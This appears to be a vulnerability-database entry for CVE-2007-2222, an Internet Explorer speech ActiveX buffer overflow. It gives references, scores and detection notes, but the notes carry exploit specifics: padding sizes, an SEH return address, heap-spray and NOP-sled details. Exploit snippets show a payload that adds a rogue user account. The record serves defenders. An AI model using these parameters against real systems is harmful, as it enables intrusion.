CVE-2007-2222
Published 2007-06-12
Priority P3 · 51 · critical · CVSS 2.0 base score 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C)
Exploit available
EPSS 57.52% (99.0th percentile)
Multiple buffer overflows in the (1) ActiveListen (Xlisten.dll) and (2) ActiveVoice (Xvoice.dll) speech controls, as used by Microsoft Internet Explorer 5.01, 6, and 7, allow remote attackers to execute arbitrary code via a crafted ActiveX object that triggers memory corruption, as demonstrated via the ModeName parameter to the FindEngine function in ACTIVEVOICEPROJECTLib.DirectSS.
Affected
3 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
| microsoft | internet_explorer | — | — |
Detection & IOCs (extracted from sources)
- Exploit triggers via the ModeName parameter to ACTIVEVOICEPROJECTLib.DirectSS.FindEngine — monitor ActiveX instantiation of this ProgID and oversized ModeName arguments.
- XP SP2 exploit uses an 888-byte 'A' padding buffer before the EBP/EIP overwrite in ModeName; the Win2000 SP4 exploit uses 950-byte 'A' padding — detect abnormally large ModeName strings passed to FindEngine.
- Win2000 SP4 exploit uses an SEH overwrite with return address 0x007d0023 (call edi) located in XVoice.dll — monitor for SEH chain corruption in processes hosting this ActiveX control.
- Exploit uses ModeID filled with ~199544 NOP bytes followed by shellcode — detect heap sprays of large NOP sleds in browser processes loading Xvoice.dll or Xlisten.dll.
- Multiple large string buffers (9,999,999 chars each) are allocated for the heap spray — detect allocation of multiple near-10MB string objects in the scripting engine context.
- Target DLL for Win2000 SP4 is C:\WINNT\speech\XVoice.dll — alert on loading of this module into iexplore.exe or other browser processes.
- Two separate exploit payloads exist: one targeting Windows XP SP2 (exploit 4066) and one targeting Windows 2000 SP4 (exploit 4065) — shellcode, NOP sled construction, and return addresses differ between the two; detection signatures must account for both variants.
- The Win2000 SP4 exploit uses a UNICODE-aware NOP sled technique (add byte ptr [esi], ch as NOP; xchg eax, edi) rather than standard 0x90 NOPs — byte-pattern signatures based solely on 0x90 NOP sleds will miss this variant.
- The XP SP2 exploit EIP value (%01%0a) is described as 'jmp to scode, UNICODE expanded' — the actual jump target is UNICODE-expanded at runtime, so static EIP value matching may not be reliable across all environments.
No detection rules found.
Exploit-DB: Microsoft Speech API ActiveX Control (Windows XP SP2) - Remote Buffer Overflow (MS07-033)
exploitdb · 2007-06-13 · CVE-2007-2222
---
REM metasploit, add a user 'su' with pass 'tzu'
Exploit-DB: Microsoft Speech API ActiveX Control (Windows 2000 SP4) - Remote Buffer Overflow (MS07-033)
exploitdb · 2007-06-13 · CVE-2007-2222
---
targetFile = "C:\WINNT\speech\XVoice.dll"
memberName = "FindEngine"
progid = "ACTIVEVOICEPROJECTLib.DirectSS"
argCount = 28
REM metasploit one, JmpCallAddtive, add a user 'su' with pass 'p'
Exploit-DB: XOOPS Module WF-Section 1.01 - 'articleId' SQL Injection
exploitdb · 2007-04-02 · CVE-2007-1974 (indexed alongside this record; it concerns a different product and CVE)
No writeups or analysis indexed.
References:
- http://osvdb.org/35353
- http://retrogod.altervista.org/win_speech_2k_sp4.html
- http://retrogod.altervista.org/win_speech_xp_sp2.html
- http://secunia.com/advisories/25627
- http://securitytracker.com/id?1018235
- http://www.exploit-db.com/exploits/4065
- http://www.kb.cert.org/vuls/id/507433
- http://www.securityfocus.com/archive/1/471947/100/0/threaded
- http://www.securityfocus.com/bid/24426
- http://www.us-cert.gov/cas/techalerts/TA07-163A.html
- http://www.vupen.com/english/advisories/2007/2153
- https://docs.microsoft.com/en-us/security-updates/securitybulletins/2007/ms07-033
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34630
- https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A2031